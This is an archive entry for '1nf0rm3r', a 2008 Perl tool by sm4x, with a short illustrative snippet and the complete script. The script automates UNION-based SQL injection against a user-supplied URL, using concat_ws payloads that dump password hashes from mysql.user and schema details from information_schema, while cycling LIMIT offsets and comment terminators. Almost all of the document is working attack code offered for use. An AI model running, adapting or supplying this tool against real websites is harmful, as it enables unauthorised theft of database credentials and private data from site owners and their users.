
informer.txt

Posted Sep 8, 2008
Authored by sm4x

1nf0rm3r is a quick Perl script that extracts database information from a website by leveraging a SQL injection vulnerability.
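
As a rough idea of the technique, the sketch below (assuming a hypothetical vulnerable id parameter at http://target.com/index.php; the URL and vector here are illustrative only) splices one of the script's concat_ws() marker payloads into a UNION SELECT, fetches the page with LWP::UserAgent, and pulls out whatever lands between the $$ and :$ markers. 1nf0rm3r simply automates this over many payloads, table names, LIMIT offsets, and comment styles.

use LWP::UserAgent;

# hypothetical injection point - replace with a real start/end link
my $start  = 'http://target.com/index.php?id=1+union+select+';
my $end    = ',2';
my $vector = 'concat_ws(0x24,0x24,concat_ws(0x3a,user(),version(),0x24))';

my $ua  = LWP::UserAgent->new();
my $res = $ua->get($start . $vector . $end . '--');
if ($res->is_success && $res->content =~ /\$\$(.*?):\$/s) {
    print "[+] $1\n";   # e.g. root@localhost:5.0.51a
}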

tags | tool, scanner, perl, sql injection
systems | unix
SHA-256 | 23db654aefd969cf38abbe0eb1ec9bb10aff74bceaba77a604a4dfa58320ab4b

#!/usr/bin/perl
# sm4x - 2008
# 1nf0rm3r.pl
# quick perl script to extract db information via website sql injections
# v1.1 - 2008-08-20
# perl informer.pl <from> <to> (for limits)

use LWP::UserAgent;
use HTTP::Request;
#use Crypt::SSLeay;

@sqldata = ();
@warns = ();
@urlhits = ();
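# @sqldata collects the extracted values, @urlhits the injection URLs that
# returned data (both deduplicated via %dups); @warns is declared but unused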

# account info (must be wrapped in $$<data>:$ or NO DATA IS DISPLAYED!!)
#@account_vectors = (
#'concat_ws(0x24,0x24,concat_ws(0x3a,user,password,0x24))',
#);

# add your own custom vectors for more dumps
@account_vectors = (
'concat_ws(0x24,0x24,concat_ws(0x3a,userid,password,0x24))',
'concat_ws(0x24,0x24,concat_ws(0x3a,user(),version(),user(),0x24))',
'concat_ws(0x24,0x24,concat_ws(0x3a,table_schema,table_name,table_type,0x24))',
'concat_ws(0x24,0x24,concat_ws(0x3a,table_name,column_name,0x24))'
);
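# the defaults above pull credentials, the current user()/version(), and
# table/column names from information_schema; each vector is tried against
# every entry in @account_dbnames below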

# account database info - custom
#@account_dbnames = (
#'mysql.user'
#);

@account_dbnames = (
'mysql.user',
'user',
'information_schema.tables',
'information_schema.columns'
);

#comments - custom
#@comments = (
#'--'
#);
@comments = (
'',
'--',
'/*'
);

# perl informer.pl <from> <to>
$offset = 0;
$sqldata = 0;
undef %dups;
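# $sqldata here is the running hit counter (a separate variable from the
# @sqldata array); $offset is unused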

$from_limit = scalar($ARGV[0]);
$to_limit = scalar($ARGV[1]);

system("clear");
print q{
[+] ---------------------------------------------------------------------
[+] .:: 1nf0rm4nt ::.
[+] ---------------------------------------------------------------------
};

printf("[+] Usage: perl informer.pl <from limit> <to limit>\n");
printf("[+] Target: http://target.com/index.php?<start link>,<injection_point>,<end link>\n");

if($from_limit > -1 && $to_limit > 0) {
printf("[+] Limit $from_limit to $to_limit\n");
}

# read the start of the injection URL
printf("[+] Site start link: ");
chomp($start_link = <STDIN>);
#$start_link = 'http://127.0.0.1/index2.php?&id=1+union+select+';

if($start_link !~ /http:\/\//) { $start_link = "http://" . $start_link; }

printf("[+] Site ending link: ");
chomp($end_link = <STDIN>);
#$end_link = ',2';

printf("[+] Targeting: $start_link$end_link\n");
printf("[+]--------------------------------\n");
printf("[+] .:: Scanning ... ::.\n");
foreach $v1(@account_vectors) {
$link = $start_link.$v1.$end_link;

# attach db with from <DBNAME>
foreach $db(@account_dbnames) {
if(length($db) > 0) { $link2 = $link.'+from+'.$db; } else { $link2 = $link; }
# was a LIMIT range requested?
if($from_limit != $to_limit && $to_limit>0) {
for($i = scalar($from_limit); $i < scalar($to_limit); $i++) {
$pwnd_link_limit = $link2 ."+limit+".$i.",1";

foreach $comment(@comments) {
$pwnd_link_limit_comments = $pwnd_link_limit.$comment;
$is_printed = 0;
#printf("LINK: $pwnd_link_limit_comments\n");
$request = HTTP::Request->new(GET=>$pwnd_link_limit_comments);
$useragent = LWP::UserAgent->new();

# check response
$response = $useragent->request($request);
if($response->is_success && $response->content =~ /\$\$/) {

my @vars = split(/\$\$/, $response->content);
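# any $$-delimited chunk containing the :$ terminator holds one extracted value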
foreach $item(@vars) {
if($item =~ /:\$/) {
#printf("INDEX: $item, $result\n");
#$c = index($item, ':$', 0);
$data = substr($item, 0, index($item, ':$', 0));
if(!$dups{$data}) {
push(@sqldata, $data); $dups{$data} = 1;
if(!$dups{$pwnd_link_limit_comments}) { push(@urlhits, $pwnd_link_limit_comments); $dups{$pwnd_link_limit_comments} = 1; }
$sqldata++;
}
#printf(".");
printf("[+] $data\n");

}
}
}
}
}
} else {
# attach comment and try
foreach $comment(@comments) {
$pwnd_link = $link2.$comment;
#printf("[+] Checking: $pwnd_link\n";
$is_printed = 0;
$request = HTTP::Request->new(GET=>$pwnd_link);
$useragent = LWP::UserAgent->new();

# check response
$response = $useragent->request($request);
if($response->is_success && $response->content =~ /\$\$/) {

my @vars = split(/\$\$/, $response->content);
foreach $item(@vars) {
if($item =~ /:\$/) {
#printf("INDEX: $item, $result\n");
#$c = index($item, ':$', 0);
$data = substr($item, 0, index($item, ':$', 0));
if(!$dups{$data}) {
push(@sqldata, $data); $dups{$data} = 1;
if(!$dups{$pwnd_link}) { push(@urlhits, $pwnd_link); $dups{$pwnd_link} = 1; }
$sqldata++;
}
#printf(".");
printf("[+] $data\n");
}
}
}
}
# record our injection URL
if(!$is_printed) {
unshift(@sqlinjections, $pwnd_link);
#printf("----------------------------------------------------------\n[+] w00t:\n $pwnd_link\n----------------------------------------------------------\n");
$is_printed = 1;
}
}
}
}

# print found data (no dups)
print q{
[+] ---------------------------------------------------------------------
[+] .:: r3p0rt ::.
[+] ---------------------------------------------------------------------
};

#print returned results
foreach $item(@sqldata) {
printf("[+] $item\n");
}

# print the injection URLs that returned data
#printf("[+] ---------------------------------------------------------------------\n");
foreach $item(@urlhits) {
printf("[+] $item\n");
}

printf("[+] ---------------------------------------------------------------------\n");
printf("[+] Total: $sqldata\n");
printf("\n[+] Done\n");

# done